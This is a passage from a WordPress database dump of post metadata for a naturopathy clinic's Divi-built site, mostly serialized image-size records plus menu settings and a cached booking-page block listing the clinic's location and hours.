:8:\"filesize\";i:567997;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:27:\"Untitled-design-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112891;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:27:\"Untitled-design-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:181913;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:27:\"Untitled-design-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:211249;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:27:\"Untitled-design-980x677.png\";s:5:\"width\";i:980;s:6:\"height\";i:677;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:498098;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:27:\"Untitled-design-480x331.png\";s:5:\"width\";i:480;s:6:\"height\";i:331;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:149898;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(437,26,'_et_pb_truncate_post_date','2026-08-18 10:59:58'),(438,26,'_et_builder_version','VB|Divi|4.9.4'),(462,188,'_et_pb_built_for_post_type','page'),(618,26,'_aioseo_title',NULL),(619,26,'_aioseo_description',NULL),(620,26,'_aioseo_keywords',''),(439,26,'_edit_last','1'),(440,26,'_wp_page_template','default'),(442,27,'_edit_last','1'),(443,27,'_wp_page_template','default'),(493,242,'_wp_attached_file','2021/05/2-01-1.png'),(494,242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:225;s:6:\"height\";i:400;s:4:\"file\";s:18:\"2021/05/2-01-1.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"2-01-1-169x300.png\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"2-01-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:18:\"2-01-1-225x250.png\";s:5:\"width\";i:225;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:18:\"2-01-1-225x284.png\";s:5:\"width\";i:225;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:18:\"2-01-1-225x382.png\";s:5:\"width\";i:225;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(444,183,'_menu_item_type','post_type'),(445,183,'_menu_item_menu_item_parent','0'),(446,183,'_menu_item_object_id','3'),(447,183,'_menu_item_object','page'),(448,183,'_menu_item_target',''),(449,183,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(450,183,'_menu_item_xfn',''),(451,183,'_menu_item_url',''),(463,188,'_et_pb_excluded_global_options','[]'),(453,184,'_menu_item_type','post_type'),(454,184,'_menu_item_menu_item_parent','0'),(455,184,'_menu_item_object_id','2'),(456,184,'_menu_item_object','page'),(457,184,'_menu_item_target',''),(458,184,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(459,184,'_menu_item_xfn',''),(460,184,'_menu_item_url',''),(621,26,'_aioseo_og_title',NULL),(464,29,'_wp_old_date','2021-05-01'),(465,30,'_wp_old_date','2021-05-01'),(469,205,'_wp_attached_file','2021/04/cropped-Standard-01-2.jpg'),(699,432,'footnotes',''),(590,345,'_wp_attached_file','2021/08/IMG_20210701_202413_037-1.jpg'),(591,345,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:37:\"2021/08/IMG_20210701_202413_037-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:38:\"IMG_20210701_202413_037-1-1024x675.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(495,243,'_wp_attached_file','2021/05/IMG_20210503_205936_105.jpg'),(496,243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1434;s:6:\"height\";i:1434;s:4:\"file\";s:35:\"2021/05/IMG_20210503_205936_105.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"IMG_20210503_205936_105-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"IMG_20210503_205936_105-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:37:\"IMG_20210503_205936_105-1080x1080.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:37:\"IMG_20210503_205936_105-1280x1280.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-980x980.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:980;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:35:\"IMG_20210503_205936_105-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(497,244,'_wp_attached_file','2021/05/IMG_20200718_210412_679-scaled.jpg'),(498,244,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2366;s:6:\"height\";i:2560;s:4:\"file\";s:42:\"2021/05/IMG_20200718_210412_679-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-277x300.jpg\";s:5:\"width\";i:277;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_20200718_210412_679-946x1024.jpg\";s:5:\"width\";i:946;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-768x831.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:831;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"IMG_20200718_210412_679-1420x1536.jpg\";s:5:\"width\";i:1420;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:37:\"IMG_20200718_210412_679-1893x2048.jpg\";s:5:\"width\";i:1893;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"IMG_20200718_210412_679-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:37:\"IMG_20200718_210412_679-1080x1169.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:1169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:37:\"IMG_20200718_210412_679-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:37:\"IMG_20200718_210412_679-1280x1385.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:36:\"IMG_20200718_210412_679-980x1060.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:1060;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:35:\"IMG_20200718_210412_679-480x519.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:519;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:27:\"IMG_20200718_210412_679.jpg\";}'),(499,245,'_wp_attached_file','2021/05/IMG_20200714_175859_865.jpg'),(500,245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:35:\"2021/05/IMG_20200714_175859_865.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_20200714_175859_865-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"IMG_20200714_175859_865-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"IMG_20200714_175859_865-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:36:\"IMG_20200714_175859_865-1080x720.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:36:\"IMG_20200714_175859_865-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-980x653.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:35:\"IMG_20200714_175859_865-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(503,48,'_edit_lock','1623652510:1'),(504,48,'_et_pb_use_builder','on'),(505,48,'_et_gb_content_width',''),(506,48,'_edit_last','1'),(507,48,'_et_pb_post_hide_nav','default'),(508,48,'_et_pb_page_layout','et_right_sidebar'),(509,48,'_et_pb_side_nav','off'),(510,48,'_et_pb_built_for_post_type','page'),(511,48,'_et_pb_ab_subjects',''),(512,48,'_et_pb_enable_shortcode_tracking',''),(513,48,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"48\" /]'),(514,48,'_et_pb_custom_css',''),(515,48,'_et_pb_gutter_width','3'),(516,48,'_thumbnail_id','0'),(517,48,'_global_colors_info','{}'),(518,48,'_et_pb_first_image',''),(519,48,'_et_pb_truncate_post','<p><div class=\"et_d4_element et_pb_section et_pb_section_0 et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_0 et_block_row\">\n <div class=\"et_d4_element et_pb_column_4_4 et_pb_column et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_0 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Make a booking</div>\n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div><div class=\"et_d4_element et_pb_section et_pb_section_1 et_pb_with_background et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_1 et_block_row\">\n <div class=\"et_d4_element et_pb_column_4_4 et_pb_column et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_code et_pb_code_0\">\n \n \n \n \n \n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div><div class=\"et_d4_element et_pb_section et_pb_section_3 et_pb_with_background et_pb_section_parallax et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_2 et_block_row\">\n <div class=\"et_d4_element et_pb_column_4_4 et_pb_column et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_with_border et_pb_module et_d4_element et_pb_text et_pb_text_1 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\"><h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2></div>\n </div>\n </div>\n \n \n \n \n </div><div class=\"et_d4_element et_pb_row et_pb_row_3 et_block_row\">\n <div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_3 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_2 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\"><h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p></div>\n </div>\n </div><div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_4 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_3 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n \n </div><div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n <a class=\"et_pb_button et_d4_element et_pb_button_0 et_pb_bg_layout_dark et_block_module\" href=\"https://verdenaturopathy.com.au/bookings\">Make a booking</a>\n </div>\n </div><div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_4 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\"><h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p></div>\n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div></p>\n'),(520,48,'_et_pb_truncate_post_date','2026-08-18 10:59:58'),(521,48,'_et_builder_version','VB|Divi|4.9.4'),(522,48,'_et_pb_show_page_creation','off'),(544,292,'_menu_item_type','post_type'),(545,292,'_menu_item_menu_item_parent','0'),(546,292,'_menu_item_object_id','48'),(547,292,'_menu_item_object','page'),(548,292,'_menu_item_target',''),(549,292,'_menu_item_classes','a:1:{i:0;s:8:\"menu_cta\";}'),(550,292,'_menu_item_xfn',''),(551,292,'_menu_item_url',''),(553,29,'_wp_old_date','2021-05-26'),(554,30,'_wp_old_date','2021-05-26'),(589,343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2279;s:6:\"height\";i:1519;s:4:\"file\";s:35:\"2021/08/IMG_20210701_202413_037.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_20210701_202413_037-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"IMG_20210701_202413_037-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:36:\"IMG_20210701_202413_037-1080x720.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:36:\"IMG_20210701_202413_037-1280x853.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:853;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-980x653.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:35:\"IMG_20210701_202413_037-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(588,343,'_wp_attached_file','2021/08/IMG_20210701_202413_037.jpg'),(594,348,'_wp_attached_file','2021/08/IMG_20210701_202413_037-3.jpg'),(595,348,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:37:\"2021/08/IMG_20210701_202413_037-3.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"IMG_20210701_202413_037-3